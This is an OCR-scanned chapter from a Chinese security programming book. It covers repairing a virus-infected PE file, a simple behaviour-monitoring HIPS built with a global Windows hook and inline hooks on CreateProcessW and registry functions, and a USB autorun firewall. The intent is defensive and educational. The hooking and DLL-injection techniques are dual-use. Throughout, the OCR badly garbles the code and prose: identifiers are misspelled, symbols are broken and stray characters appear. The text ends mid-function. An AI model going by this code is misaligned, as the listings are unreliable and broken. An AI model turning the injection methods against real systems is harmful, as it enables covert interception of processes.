修复 后 再 次 使 用 PEID 进行 对 比 ， 发 现 已 经 相同 了 。 最 后 一 步 就 是 要 将 病毒 所 在 的 节 数据 
移 除 ， 移 除 后 对 应 的 节 表 信息 、 节 数量 信息 、 映 像 大 小 信息 等 都 要 进行 调整 ， 具 体 代码 如 下 : 


VOID CRepairpe::Repair(char *psrc, char *pDest) 
{ 





赴 一 一 


| 
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PIMRAGE_DOS_HERDER pSrclimgDosHdr : 
PIMAGE NT HEADERS pSrcImgNtHdr; 

PIMAGE SECTION. HEADER pSrcIimgSecHdr; 
PIMAGE_SECTION HEADER pSsreLastIimgSecHdAdr; 
WORD wSrcSecNum,: wDestSecNum; 


HANDLE hsrcFile = CreateFile(pSre, GENERIC READ, FILE, SHARE READ, 

NULL, OPEN EXTISTING, 

FILE ATTRIBUTE NORMAL, NULL); 
HANDLE hsSrcMap = CreateFileMapping(hSrcFile, NULL, PAGE READONLY, 0, 0, NULL); 
LPVOID lpSrcBase = MapViewOfFile(hsSrcMap, FILE MAP.READ, 0, 0, 0); 


psrcIimgDosHdr = (PIMAGE DOS HEADER)1lpSrcBase; 
pSrcImgNtHdr = (PIMAGE NT HEADERS) ((DWORD)1PSrcBase + pSrcImgDosHdr->e_ lfanew); 
pSsrcIimgSecHdr = (PIMAGE SECTION HEADER) ( (DWORD) gpSrcIimgNtHdr->OptionalHeader 

+ pSsroIimgNtHdr->FileHeader.SizeOfOptionalHeader); 


wSrcSecNum = pSrcImgNtHdr->FileHeader.NumberOfSections; 
psroeLastIimngSecHdr = parcrmngSsecHdr + wercSecNum 一 1:; 


DWORD dwSrcFileSize'= GetFileSize(hSrcFile, NULL); 
DWORD dwSrcSecSsize = psrcLastlimgSecHdr->PointerToRawData 
+ pSsrcLastIimgSecHdr->SizeOfRawData; 


LPVOID lpBase’; 

DWORD dwNum; 

14f"( dwSsrcFileSize > dwSrcSecSsize ) 

上 
lpBase = VirtualAlloc (NULL, (dwSsrcFileSize - GawsrcSecSize) ， 

MEM COMMIT, PAGE READWRITE); 
SetFilePointer'(hsrcFile, dwsrcSecSize, NULL, FILE, BEGIN); 
ReadFile (hsrcFile, lpBase, (dwSrcocFileSize - dwSrcSecSize), 
&dwNum, NULL); 
} 


UnmapViewOfFile(lpSrcBase); 
CloseHandle (hSrcMap); 
CloseHandle (hsSrcFile); 


HANDLE hDestFile = CreateFile(pDest, GENERIC ALL, FILE SHARE READ, 
NULL, OPEN EXISTING, FILE ATTRIBUTE NORMAL, NULL),; 
IMAGE DOS HEADER ImgDosHdr; 
IMAGE NT HEADERS ImgNtHdr; 
IMAGE SECTION HEADER ImgSecHdr, ImgSecHdr1, ImgSecHdr2; 


ReadFile (hDestFile, &ImgDosHdr, sizeof (IMAGE DOS HEADER), &dwNum, NULL); 
SetFilePpointer(hDestFile, ImgDosHdr.e, lfanew, NULL, FILE BEGIN); 
ReadFile(hDestFile, &ImgNtHdr, sizeof (IMAGE NT HEADERS), &dwNum, NULL); 
wDestSecNum = ImgNtHdr.FileHeader.NumberOfSections; 

SetFilePointer (hDestFile, sizeof (IMAGE SECTION HEADER) * (wDestSecNum - 2), NULL, 
FILE CURRENT); 

ReadFile(hDestFile, &IimgSecHdr2, sizeof (IMAGE SECTION HEADER), &dwNum, NULL); 
ReadFile (hDestFile, &imgSecHdr, sizeof (IMAGE SECTION HEADER), ‘gdwNum, NULL).; 


SetFilePointer (hDestFile, ((-1) * sizeof (IMAGE SECTION HEADER)), NULL, FILE CURRENT); 
ZeroMemory (giImgSecHdr1l, sizeof (IMAGE SECTION HEADER)); 
WriteFile(hDestFile, &ImgSecHdrl, ‘sizeof (IMAGE SECTION HEADER), gdwNum, NULL); 


DWORD dwFileEnd = ImgSecHdr.PointerToRawData; 
SetEilePointer (hDestrFrile, dwFilegEnd, NULL, FILE BEGIN); 
SetEndofrFile(hDestFile); 


SetFilePointer (hDestFile, 0, NULL, FILE, END)'; 
WriteFile(hDestFile, lpBase, (dwSrcFileSize —- dwSrcSecSize), gdwNum, NULL); 


(a 


由 小 
= 
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ImgNtHdr.FileHeader.NumberOfSections -一 

ImgNtHdr.OptionalHeader.SizeOfIimage = ImgSecHdr2.VirtualAddress + Align(ImgSec- 
Hdr2.Misc.VirtualSize, ImgNtHdr.OptionalHeader. 

SectionAlignment); 


SetFilePointer(hDestFile, ImgDosHdr.e lfanew, NULL, FILE BEGIN); 
WriteFile'(hDestFile, &ImgNtHdr, sizeof (IMAGE NT HEADERS), &dwNum;: NULL); 


CloseHandle (hDestFile); 
} 


修复 完成 后 再 次 运行 修复 的 病毒 程序 ， 发 现 是 可 以 运行 的 。 然 后 比较 它们 的 节 数 量 及 文 
件 大 小 ， 可 以 看 出 都 已 经 完善 了 。 整 个 的 病毒 特征 码 扫描 、 病 毒 修复 的 代码 就 完成 了 。 至 于 
前 面 的 界面 部 分 ， 这 里 就 不 给 出 代码 了 。 

这 里 对 感染 型 病毒 的 修复 其 实 并 不 完美 ， 虽 然 把 它 成 功 地 修复 了 。 为 什么 不 完美 呢 ? 对 
于 病毒 代码 的 解密 是 动态 完成 的 , 它 还 原 入 口 处 的 代码 是 在 执行 真正 的 病毒 代码 之 前 还 原 的 。 
如 果 是 在 病毒 代码 之 后 还 原 的 话 ， 这 样 动态 的 方式 去 还 原 岂 不 是 帮助 所 有 感染 的 病毒 程序 运 
行 了 一 次 病毒 代码 ? 正 因为 是 在 之 前 运行 的 ， 因 此 采用 了 这 种 方法 ， 而 正确 的 方法 是 通过 专 
杀 程 序 去 完成 感染 程序 入 口 的 还 原 。 关 于 病毒 专 杀 的 部 分 就 介绍 到 这 里 。 


8.3.2 行为 监控 HIPS 


现在 有 一 种 流行 的 防 病毒 软件 被 称 作 HIPS， 中 文 名 字 为 主机 防御 系统 ， 比 如 EQ。 该 软 
件 可 以 在 进程 创建 时 、 有 进程 对 注册 表 进 行 写 入 时 或 有 驱动 被 加 载 时 ， 给 用 户 予 以 选择 ， 选 
择 是 否 拦截 进程 的 创建 、 是 否 拦截 注册 表 的 写 入 、 是 否 拦截 驱动 的 加 载 等 功能 。 

HIPS 纯粹 是 以 预防 为 主 ， 比 如 有 陌生 的 进程 在 被 创建 阶段 ， 就 可 以 让 用 户 禁止 ， 这 样 就 
避免 了 特征 码 查 杀 的 滞后 性 。 对 于 杀毒 软件 的 特征 码 查 杀 而 言 ， 如 果 杀 毒 软 件 不 更 新 病毒 
数据 库 ， 那 么 依赖 病毒 特征 码 的 杀毒 软件 就 无 法 查 杀 新 型 的 病毒 ， 对 新 型 的 病毒 就 成 为 一 
个 摆设 。 

行为 监控 的 原理 主要 就 是 对 相关 的 关键 API 函数 进行 HOOK， 比 如 前 面 介绍 的 进程 拦截 。 
当 一 个 木马 程序 要 秘密 启动 的 时 候 ， 对 CreateProcessW() 函 数 进 行 了 HOOK， 在 进程 被 创建 
前 ， 会 询问 用 户 是 否 启 动 该 进程 ， 那 么 木马 的 隐秘 启动 就 被 暴露 出 来 了 。 对 于 没有 安全 知识 
的 大 众 来 说 ， 使 用 HIPS 可 能 有 点 困难 ， 也 许 仍 然 会 让 木马 运行 。 因 为 不 是 每 个 使 用 计算 机 
的 人 都 对 计算 机 有 所 了 解 ， 计 算 机 对 于 他 们 而 言 可 能 只 用 来 打 游戏 或 看 电影 。 这 该 如 何 做 呢 ? 
现在 通常 使 用 的 方法 就 是 使 用 白 库 和 黑 库 , 也 就 是 所 谓 的 白 名 单 和 黑 名 单 。 在 进程 被 创建 时 ， 
把 要 创建 的 进程 到 黑白 库 中 去 匹配 ， 然 后 做 相应 的 动作 ， 或 者 放行 ， 或 者 拦截 。 

下 面 就 来 实现 一 个 应 用 层 下 的 简单 的 进程 防火 墙 、 注 册 表 防火 墙 的 功能 。 

1. 简单 进程 防火 墙 

进程 防火 墙 指 的 是 放行 /拦截 准备 要 创建 的 进程 。 通 过 前 面 的 章节 可 以 知道 ， 进 程 的 创 
建 是 依靠 CreateProcessW0 函 数 完 成 的 。 只 要 HOOK CreateProcessW() 函 数 就 可 以 实现 进程 
防火 墙 的 功能 。 对 于 注册 表 来 说 ， 要 对 非法 进程 进行 删除 或 写 入 注册 表 键 值 进行 管控 ， 因 
此 需要 HOOK 两 个 注册 表 函 数 ， 分 别 是 注册 表 写 入 函数 RegSetValueExW() 和 注册 表 删 除 函 
数 RegDeleteValueW()。 由 于 使 用 了 HOOK， 那么 就 必然 要 涉及 DLL 的 编写 。 这 里 分 DLL 和 
EXE 两 部 分 来 进行 详细 的 介绍 。 
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2.， 实现 HOOK 部 分 的 DLL 程序 的 编写 
因为 要 对 目标 进程 进行 HOOK， 因 此 要 编写 DLL 程序 。 创 建 一 个 DLL 程序 ， 并 加 入 前 


面 已 封装 的 ILHook.h 头 文 件 和 ILHook.cpp 的 实现 文件 。 


为 了 能 在 所 有 的 基于 消息 的 进程 中 注入 自己 的 DLL, 必须 使 用 Windows 钧 子 , 这 样 就 可 


以 将 DLL 轻易 地 注入 基于 消息 的 进程 中 。 代 码 如 下 : 


#pragma data _seg(".shared") 
HHOOK g hHook = NULL; 
#pragma data seg() 


#pragma comment (linker, ".shared, RWS") 


extern nc" _declspec(dllexport) VOID SetHookOn (HWND hWnd); 
extern "CE" ° declspec'(dlilexport) VOID SetHookOfE(); 


HWND g_ExeHwnd = NULL; 


LRESULT CALLBACK GetMsgProc!( 
int code, // 钩子 编码 
WPARAM wParam,， // 移 除 选项 
LPARAM 1param ，// 消息 
) 

{ 

return CallNextHookEx (ghHook, code, wParam, lParam); 
} 


VOID SetHookOn (HWND hwnda) 
{ 

g_ExeHwnd = hWnd; 

SetWindowsHookEx (WH_,GETMESSAGE, GetMsgProc, g hIinst, 0); 
} 


VOID SetHookOff () 

‘| 
UnhookWindowsHookEx (g_hHook); 
g_hHook = NULL; 

} 


以 上 函数 用 来 定义 导出 函数 ， 用 于 加 载 完 成 HOOK 功能 的 DLL 文件 。 这 里 利用 WH _ 
GETMESSAGE 钩子 类 型 。 它 在 前 面 介绍 过 ， 这 里 就 不 做 过 多 的 介绍 了 。 


定义 3 个 CILHook 类 的 对 象 ， 分 别 用 来 对 CreateProcessW() 函 数 、RegSetValueExW() 函 


数 和 RegDeleteValueW0 函 数 进行 挂钩 。 有 具体 定义 如 下 : 


CILHook RegSetValueEBzxWHooOKk; 
CILHooOk CreateprocessWHook; 
CIEHock RegDeleteValueWHook; 


HOOK 部 分 是 在 DIIMain() 函 数 中 完成 的 ， 具 体 代 码 如 下 : 
BOOL APIENTRY DliMain!( HANDLE hModule, 
DWORD uliveason .for call,; 
LPEVOID lpReserved 
) 





switon (ul, reason for call ) 
{ 
case DLL PROCESS ATTACH: 
b 
g_hIinst = (HINSTANCE)hnModule; 
RegSetValueExWHook.Hook ("advapi32.d11", 
"RegSetValueExW", 
(PROC)MyRegSetValueExA); 
RegDeleteValueWHook.Hook ("advapi32.d11", 
"RegDeleteValueW”", 
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(PROC) MyRegDeleteValueW); 
CreateProcessWHook.Hook ("kernel32.d11", 
"CreatePprocessW", 
(PROC) MyCreateProcessW); 
break; 
} 
case DLL PROCESS_ DETACH: 
{ 
RegSetValueExWHook.UnHook()? 
RegDeleteValueWHook .UnHook (); 
CreateProcessWHook.UnHook (); 
if ( g hHook != NULE ) 
{ 
SetHookOff£ (); 
} 
break; 


} 


return TRUE; 


} 

放行 /拦截 部 分 是 给 用 户 选择 的 ， 那 么 就 要 给 出 提示 让 用 户 进行 选择 ， 至 少 要 给 出 放行 / 
拦截 的 类 型 ， 比 如 是 注册 表 写 入 或 是 进程 的 创建 ， 还 要 给 出 是 哪个 进程 进行 的 操作 。 要 把 这 
个 信息 反馈 给 用 户 ， 这 里 定义 一 个 结构 体 ， 将 该 结构 体 的 信息 发 送 给 用 于 加 载 DLL 的 EXE 
文件 ， 并 让 EXE 给 出 提示 。 结 构 体 定义 如 下 : 


typedef struct _HIPS_ INFO 

{ 
WCHAR wProcessName [0x200]; 
DWORD dwHipsClass; 

FHIPS INEO “PHIPS TNEO? 


定义 一 些 常量 用 来 标识 放行 /拦截 的 类 型 ， 具 体 如 下 : 
Hdefine HIPS .CREATEPROCESS 0X00000001T, 
Hdefine HIPS REGSETVALUE 0x00000002L 
#define HIPS. REGDELETEVALUE Ox00000003L 


将 这 些 定 义 好 以 后 ， 就 可 以 开始 完成 HOOK 函数 了 。 这 里 主要 给 出 CreateProcessW0) 函 
数 的 HOOK 实现 。 其 余 两 个 函数 的 HOOK 实现 ， 请 读者 自行 实现 。 具 体 代 码 如 下 : 


BOOL 
WINAPI 
MyCreateProcessWw!( 
= inopt LPCWSTR lpApplicationName, 
inout opt LPWSTR lpCommandLine, 
in opt LPSECURITY ATTRIBUTES lpProcessAttributes, 
in opt LPSECURITY ATTRIBUTES lpThreadAttributes; 


ad BOOL DTInheritHandlesy 

in DWORD dwCreationFlags, 

in apt LPVOID lpEnvironment; 

= Ln vt LPCWSTR lpCurrentDirectory; 
二 yh LPSTARTUPINFOW lpStartupIinfo, 


Out LPPROCESS INFORMATION lpProcessInformation 
) 


HILIRS, TINEO /sg,= 0 
if ( wcslen(lpCommandLine) != 0 ) 
{ 
WCSCPpY (sz.wProcessName, lpCommandLine); 


} 


else 


{ 


wcscpy (sz.wProcessName, lpApplicationName); 
} 


sz.dwHipsClass = HIPS CREATEPROCESS; 
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GOPYDRTRSTRUC CQsli= { NULL, Sizeof(HIPS TINRO) (vord wy &sz }? 
BOOL bRet = FALSE; 
if ( SendMessage (FindWindow (NULL, "Easy Hips For R3"), 
WM_COPYDATA, 
GetCurrentProcessid()' 
(LEARAM) &cds) != -1 ) 


CreateprocessWHook.UnHook (); 

bRet = CreateProcessW (lpApplicationName, lpCommandLine, 
lpProcessAttributes, lpThreadAttributes, 
binheritHandles, dwCreationFlags, 
lpEnvironment, lpCurrentDirectory, 
lpStartupInfo, lpProcessIinformation); 

CreateProcessWHook.ReHook (); 

} 


return bRet; 
} 
这 里 使 用 了 一 个 SendMessage0 函 数 ， 该 函数 用 来 发 送 一 个 WM_COPYDATA 消息 , 将 结 


构 体 传 给 了 加 载 DLL 的 EXE 程序， 使 EXE 程序 把 提示 显示 给 用 户 。 
SendMessage() 函 数 的 功能 非常 强大 ， 其 定义 如 下 : 


LRESULT SendMessagel 
HWND hwnad, 
UINT Msg, 
WEARAM wParam, 
LPARAM lParam 
4 
该 函数 的 第 一 个 参数 是 目标 窗口 的 句柄 ， 第 二 个 参数 是 消息 类 型 ， 最 后 两 个 参数 是 消息 


的 附加 参数 ， 根 据 消 息 类 型 的 不 同 而 不 同 。 
以 上 代码 就 是 DLL 程序 的 全 部 了 , 剩 下 两 个 对 注册 表 操 作 的 HOOK 函数 , 由 读者 自己 完成 。 
3. 行为 监控 前 台 程 序 的 编写 
先 来 看 一 下 程序 能 达到 的 效果 ， 再 讲解 程序 EXE 部 分 的 实现 代码 ， 如 图 8-60 和 图 8-61 所 示 。 


gir Easy Hips For R3 内 人 


- 闫 埠 日 赴 -一 一 一 一 一 一 一 一 一 -一 一 一 









进程 人 是 巷 
涝 入 创 各 贡生 





| “C;\WINDOWS\systemn32\notepad 
| |) aaaa/ "CREIDORS\systen2\eale. ent 
| 
| 


是 杰 动 这 进程 : 





ba 
区 评 | 职 消 | 


图 8-60 程序 主 界 面 图 8-61 拦截 提示 框 





从 上 面 两 个 图 可 以 看 出 ， 程 序 的 确 是 可 以 拦截 进程 的 启动 的 。 当 单 击 “ 人 允许 ”按钮 后 ， 
进程 会 被 正常 创建 ; 当 单 击 “取消” 按钮 后 ， 进 程 将 被 阻止 创建 。 这 就 是 最 终 要 完成 的 功能 ， 
来 看 看 主要 的 实现 代码 。 

EXE 的 部 分 主要 就 是 如 何 来 启动 行为 监控 功能 ， 以 及 如 何 接收 DLL 程序 通过 SendMessage() 
函数 发 出 的 消息 给 用 户 弹出 提示 框 。 进行 拦截 的 部 分 已 经 在 DLL 程序 中 通过 HOOK 实现 了 ， 
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所 以 重点 也 就 在 界面 上 和 消息 的 接收 上 。 
先 看 如 何 启 动 和 停止 行为 的 监控 。 具 体 代码 如 下 : 


typedef VOID (*SETHOOKON) (HWND); 
typedef VOID (SETHOOKOFEY ()'; 





wo ONipesDlor Onptnon'() 


} 


在 此 处 添加 处 理 程序 的 代码 
mhinst = Loadlibrary("EasyHips.d11"); 
SETHOOKON SetHookOn = (SETHOOKON)GetProcAddress (m hInst, "SetHookOn"); 


SetHookOn (GetSafeHwnd()); 
FreeLibrary(m hIinst); 

m Btnon.EnableWindow (FALSE); 
m BtnOoff.EnableWindow (TRUE); 


Vongd, GHipsDlog::OnBtnOEE!() 


在 此 处 添加 处 理 程序 的 代码 
mhinst= GetModuleHanadle ("hasyHips.dllY),; 
SETHOOKOFF SetHookOff = (SETHOOKOFF)GetProcAddress(m hIinst, "SetHooOkOff"); 
SetHookOQff (); 
CloseHandle (m hIinst); 
FreeLibrary (m hIinst); 
mBtnon.EnableWindow (TRUE); 
m BtnOff,EnableWindow (FALSE); 


} 

从 代码 中 不 难看 出 ， 直 接 调用 了 DLL 的 两 个 导出 函数 ,就 可 以 开启 自己 的 打开 。 在 关闭 
时 为 什么 调用 了 CloseHandle() 函 数 和 FreeLibrary(0) 函 数 呢 ?把 FreeLibrary(0) 函 数 去 掉 ， 然 后 单 
击 “ 停 止 ” 监 控 行 为 ， 但 还 是 处 在 被 监控 的 状态 下 。 因 为 恢复 Inline Hook 是 在 DLL 被 扼 载 的 
情况 。 因 此, 在 外 载 时 , 调用 GetModuleHandle() 获 得 本 进程 的 DLL 句柄 后 ,虽然 CloseHandle() 
了 ， 但 是 只 是 减少 了 对 DLL 的 引用 计数 ， 并 没有 真正 释放 ， 必 须 再 次 使 用 FreeLibrary() 函 数 才 
可 以 使 DLL 被 卸载 ， 从 而 恢复 Inline Hook。 

EXE 程序 接收 DLL 消息 的 代码 如 下 : 


BOOL CHipsD1ig::QOnCopyData (CWnd* pWnd, COPYDATASTRUCT* pCopyDatastruct) 








// 在 此 处 添加 处 理 程序 的 代码 


CTIiDS TDS ' 
PHIPS INEO pHipsTInto = (PHIPS INFO)pCopyDataSstruct >lpData; 
Wescpy(Tdapa, sz PHIDSTInrtor>wBrocessName) 


Tips.DoModal (); 


int nNum,=-m HipsReports.GetIitemCoant()’; 
Ootring, Stre 

Str,phormat (Sd, nyumy) 

m HipsReports,.InsertIitem(nNum, Str); 


SYSTEMTIME StTime; 
GetLocalTime (&StTime); 
Str.hormat("%04d/%02d/%02d '%02d:%02d: %02d"; 
StTime.wYear, 
StTime.wMonth, 
StTime.wDay, 
StTime.wHour, 
StTime.wMonth, 
StTime.wSecond); 








8.3” 反 病毒 编程 技术 





m HipsReports.SetItemText (ANum, 1, Str); 
tre Pormatt{t son TipS. ae)? 
m HipsReports,SetItemText (nNum, 2, Str); 


switch ( pHipsIinfo->dwHipsClass ) 
{ 
case HIPS CREATEPROCESS: 


{ 
Str /= "进程 创建 "; 
break; 
} 
case HIPS REGSETVALUE: 
{ 
break; 


} 
case HIPS REGDELETEVALUE: 
{ 
break; 
} 
} 
m HipsReports.SetItemText (nNum, 3, Str); 


Str,Format ("Ss", Tips.bRet ? “放行 ” : "拦截 *); 
m HipsReports.SetItemText (nNum, 4, Str):; 


if£ ( Tips.bRet ) 
{ 

return 0;» 
} 


else 


return -1; 


} 


return CDialog::OnCopyData (pWnd, pCopyDataSstruct); 
} 


这 部 分 代码 就 是 对 WM_COPYDATA 消息 的 一 个 响应 ， 整 个 代码 基本 是 对 界面 进行 了 操 
作 。 在 代码 中 有 一 个 CTips 类 的 对 象 ， 这 个 类 是 用 来 自 定义 窗口 的 。 该 窗口 就 是 用 来 提示 放 
行 和 拦截 的 窗口 ， 其 主要 代码 如 下 : 


void CTips: :OnBtnOk() 


{ 
// 在 此 处 添加 处 理 程序 的 代码 
bRet = TRUE; 
EndDialog (0); 
} 


void CTips: :OnBtnCancel () 


// 在 此 处 添加 处 理 程序 的 代码 
bRet = FALSE; 
EndDialog(0)» 

} 


DLL 程序 中 的 SendMessage() 函 数 的 返回 要 等 待 WM_COPYDATA 的 消息 结束 ， 并 从 中 
获得 返回 值 来 决定 下 一 步 是 否 执行 ， 因 此 这 里 只 要 简单 地 返回 TRUE 或 FALSE 即 可 。 

对 于 行为 监控 就 介绍 这 么 多 。 这 个 例子 演示 了 如 何 通 过 Inline Hook 达到 对 进程 创建 、 注 
册 表 操作 的 管控 。 当 然 , 这 里 的 代码 并 不 能 管控 所 有 的 进程 ,而 且 这 里 的 行为 监控 过 于 简单 ， 
很 容易 被 恶意 程序 突破 。 这 里 主要 是 通过 实例 来 完成 对 行为 监控 原理 的 介绍 ， 希 望 可 以 起 到 
抛砖引玉 的 作用 。 
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8.3.3 U 盘 防 御 软件 


在 早期 互联 网 还 不 发 达 的 时 候 ， 病 毒 都 是 通过 软盘 、 光 盘 等 媒介 进行 传播 的 。 到 后 来 互 
联网 被 普及 以 后 ， 通 过 互联 网 进行 传播 的 病毒 大 面积 地 相继 出 现 。 虽 然 软盘 已 经 被 淘汰 ， 但 
是 并 没有 使 移动 磁盘 的 病毒 减少 。 相 反 ，U 盘 的 普及 使 得 移动 磁盘 对 病毒 的 传播 更 加 方便 。 
U 盘 的 数据 传输 速度 和 数据 存储 容量 等 多 方面 都 比 软盘 要 先进 很 多 ， 因 此 ， 软 盘 可 以 传播 病 
毒 ，U 盘 当 然 也 可 以 传播 病毒 。 

通过 U 盘 来 传播 病毒 通常 是 使 用 操作 系统 的 自动 运行 功能 ， 并 配合 U 盘 下 的 Autorun.inf 
文件 来 实现 的 。 著 名 的 “摆渡 攻击 ”就 是 依靠 此 Autorun.inf 来 进行 实施 的 。 如 果 让 操作 系统 
不 自动 运行 移动 磁盘 , 或 者 保证 移动 磁盘 下 不 存在 Autorun.inf 文件 ,那么 通过 U 盘 感 染病 毒 
的 几率 就 小 很 多 了 。 

1. 通过 系统 配置 禁止 自动 运行 

先 来 介绍 如 何 通过 系统 配置 禁止 U 盘 中 Autorun.inf 的 自动 运行 。 通 常情 况 下 需要 进行 两 
方面 的 设置 ， 一 方面 是 通过 “管理 工具 ”中 的 “服务 ”来 进行 设置 ， 另 一 方面 是 通过 “组 策 
略 ” 来 进行 设置 。 一 般 这 两 处 都 需要 进行 修改 。 下 面 分 别 介绍 如 何 对 这 两 处 进行 设置 。 

先 来 看 如 何在 “服务 ”中 进行 设置 。 首 先 打开 控制 面板 中 的 “管理 工具 ”， 然 后 找到 “ 服 
务 ”， 将 其 双击 打开 。 在 服务 列表 中 找到 名 称 为 “Shell Hardware Detection” 的 服务 ， 双 击 该 
服务 ， 打 开 “Shell Hardware Detection 的 属性 ”对 话 框 。 单 击 “ 停 止 ” 按 钮 将 该 服务 停止 ， 
再 把 “启动 类 型 ”修改 为 “已 禁用 ”状态 ， 如 图 8-62 所 示 。 

将 服务 中 的 “Shell Hardware Detection” 禁 用 后 ， 再 对 “组 策略 ”进行 设置 。 首 先 在 “ 运 
行 ” 中 输入 “gpeditmsc”， 然 后 依次 单 击 左边 的 树 形 控件 “计算 机 配置 ”一 “管理 模板 ”一 
“系统 ”， 再 在 右边 双击 “关闭 自动 播放 ”选项 ， 弹 出 “关闭 自动 播放 属性 ”对 话 框 。 在 “ 设 
置 ” 选 项 卡 中 选择 “已 启用 ” 单 选项 ， 在 “关闭 自动 播放 ”处 选择 “所 有 驱动 器 ”选项 ， 设 
置 完成 后 单 击 “ 确 定 ” 按 钮 。 再 到 左边 的 树 形 控件 中 选择 “用 户 配置 ”一 “管理 模板 ”一 “ 系 
统 ” 到 右边 找到 “自动 关闭 播放 ”选项 ， 设 置 方法 同上 ， 如 图 8-63 所 示 。 


关闭 自 3 动 拓 放 屋 考 










售 规 “| 登录 “| 例 复 ”] 依存 关系 | 
骤 务 名 称 : ShallimiDatection 
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CC ] 取消 | Ra | . | 
图 8-62 禁用 “Shell Hardware Detection” 服 务 图 8-63 组 策略 中 的 “关闭 自动 播放 ” 
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通过 以 上 设置 ， 的 确 可 以 相对 有 效 地 保护 计算 机 不 中 U 盘 相 关 的 病毒 。 不 过 ,不 能 因此 
而 满足 ， 因 为 目的 是 打造 一 个 U 盘 防 御 的 软件 。 

2. 打造 一 个 简易 的 U 盘 防 御 软 件 

这 里 打造 一 个 U 盘 防 火 墙 ， 当 插入 U 盘 时 会 有 提示 ， 并 且 自 动 检查 U 盘 下 是 否 有 
Autorun.inf 文件 ， 并 解析 Autorun.inf 文件 。 除 此 之 外 ， 通 过 U 盘 防火 墙 可 以 打开 TU 盘 ， 从 
而 安全 地 使 用 口 盘 。 

如 何 才能 知道 有 器 盘 被 插入 电脑 昵 ” 可 以 使 用 定时 器 不 断 地 检查 , 也 可 以 开启 一 个 线程 
不 断 地 检查 ， 还 可 以 通过 Windows 的 消息 得 到 通知 。 前 两 种 方法 笨 了 些 ， 这 里 主动 不 断 地 检 
查 是 否 有 DU 盘 插 入 ， 不 如 被 动 地 等 待 Windows 的 消息 来 通知 。 

3. WM_DEVICECHANGE 和 OnDeviceChange() 

在 Windows 下 有 一 个 消息 可 以 通知 应 用 程序 计算 机 配置 发 生 了 变化 ， 这 个 消息 是 WM_ 


DEVICECHANGE。 消 息 过 程 定义 如 下 : 
LRESULT CALLBACK WindowProc ( 

HWND hwnd, 

UINT uMsg, 

WPARAM wParam, 

LPARAM lParam 

) 和 


该 消息 通过 两 个 附加 参数 来 进行 使 用 ， 其 中 wParam 表示 设备 改变 的 事件 ，lParam 表示 
事件 对 应 的 数据 。 要 得 到 设备 被 插入 的 消息 类 型 ， 因 此 wParam 的 取 值 为 DBT_DEVIC 
EARRIVAL， 而 该 消息 对 应 的 数据 类 型 为 DEV_BROADCAST_ HDR， 该 结构 体 的 定义 如 下 : 


typedef struct _DEV_ BROADCAST_ HDR { 
DWORD dbch size; 
DWORD dbch devicetype; 
DWORD dbch reserved; 

} DEV_BROADCAST HDR; 

typedef DEV _ BROADCAST HDR *PDEV BROADCAST HDR; 

在 该 结构 体 中 ， 主 要 看 的 是 dbch_ devicetype， 也 就 是 设备 的 类 型 。 如 果 设 备 类 型 为 
DBT_DEVTYP_ VOLUME， 则 把 当前 结构 体 转换 为 DEV_BROADCAST_ VOLUME 结构 体 ， 
该 结构 体 定 义 如 下 : 

typedef struct _DEV_BROADCAST VOLUME { 

DWORD dbev size; 
DWORD abcv devicetype; 
DWORD dbev reserved; 
DWORD dbev unitmask; 
WORD dbev fjags; 
} DEV_ BROADCAST VOLUME; 
typedef DEV BROADCAST VOLUME *PDEV BROADCAST VOLUME; 


在 该 结构 体 中 ， 主 要 看 的 是 dbcv_unitmask 和 dbev_flags。dbev_unitmask 通过 位 表示 逻 
辑 盘 符 ， 第 0 位 表示 A 盘 ， 第 1 位 表示 B 盘 。dbcv flags 表示 受 影 响 的 盘 符 或 媒介 ， 其 值 为 
0 时 表示 U 盘 或 移动 硬盘 。 

上 面 介绍 了 WM_DEVICECHANGE 消息 ， 由 于 是 在 MFC 下 进行 开发 的 ， 因 此 可 以 使 用 
OnDeviceChange0 消息 响应 函数 来 代替 WM DEVICECHANGE 消息 。 虽 然 使 用 了 
OnDeviceChange() 消 息 响应 函数 而 没有 使 用 WM_DEVICECHANGE, 但 是 响应 函数 的 附加 人 参 


数 与 WM_DEVICECHANGE 相同 。OnDeviceChange0) 函 数 定义 如 下 : 
afx msg BOOL OnDeviceCchange(l UINT nEventType, DWORD GQwpata ); 


尝 悟 宰 将 沿革 啊 镁 册 虽 小 
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4. 通过 OnDeviceChange() 消 息 获 得 被 插入 U 盘 的 盘 符 


第 前 面 介绍 了 对 WM_DEVICECHANGE 消息 , 下 面 使 用 MFC 下 的 OnDeviceChange() 消 息 
音 响应 函数 来 编写 一 个 获取 被 插入 U 盘 的 盘 符 的 小 程序 ， 为 编写 U 盘 防 火 墙 做 简单 的 准备 工 
作 。 首 先 来 添加 消息 映射 ， 有 具体 代码 如 下 : 
黑 BEGIN MESSAGE MAP (CUFirewallDlg, CDialog) 
客 //{{AFX MSG MAP (CUFirewallDlg) 
编 ON_MESSAGE (WM_ DEVICECHANGE, OnDeviceChange) 
程 ON WM_SYSCOMMAND () 
实 ON_WM_ PAINT () 
例 ON_WM_ QUERYDRAGICON () 
剖 //11AFX MSG MAP 
析 END MESSAGE MAP'() 
在 头 文件 中 添加 消息 响应 函数 的 定义 ， 有 具体 如 下 : 
// Generated message map functions 
Ee //{{AFX MSG (CUFirewallDlg) 


afx msg BOOL OnDeviceChange (UINT nEventType, DWORD dwData);  // 消息 响应 函数 
virtual BOOL OnInitDialog(); 

afx msg void OnSysCommand (UINT nIiD, LPARAM lParam); 

afx msg void Onpaint(): 

afx msg HCURSOR OnQueryDragIcon () : 

//}}AFX_ MSG 


最 后 添加 消息 响应 函数 的 实现 ， 有 具体 代码 如 下 : 
BOOL CUFirewallDlg: ;OrnDeviceChange (UINT nEventType, DWORD dwData) 


{ 
if ( nEventType == DBT DEVICEARRIVAL ) 


{ 
PDEV_BROADCAST HDR pDevHdr = (PDEV_ BROADCAST HDR)dwData; 
if ( pDevHdr->dbeh devicetype == DBT DEVTYP VOLUME ) 


{ 
PDEV_BROADCAST VOLUME pDevVolume = (PDEV BROADCAST VOLUME)pDevHar; 


// pDevVolume->dbcv_flags 为 0 表示 为 口 盘 
df ( pDevVolume->dbcv flags == 0 ) 
{ 


CString DriverName; 


Chae 二/ 


// 通过 将 pDevVolume->dbcv_unitmask 移 位 来 判断 盘 符 
DWORD dwUnitmask = pDevVolume->dbcv unitmask; 
Eor Wi = 0 TD < GN 生生 ) 
{ 

if ( dwUnitmask & Oxl) 


{ 
break; 


} 


dwUnitmask = dwUnitmask >> 1; 


于 {6 1) 
{ 


return ; 
} 
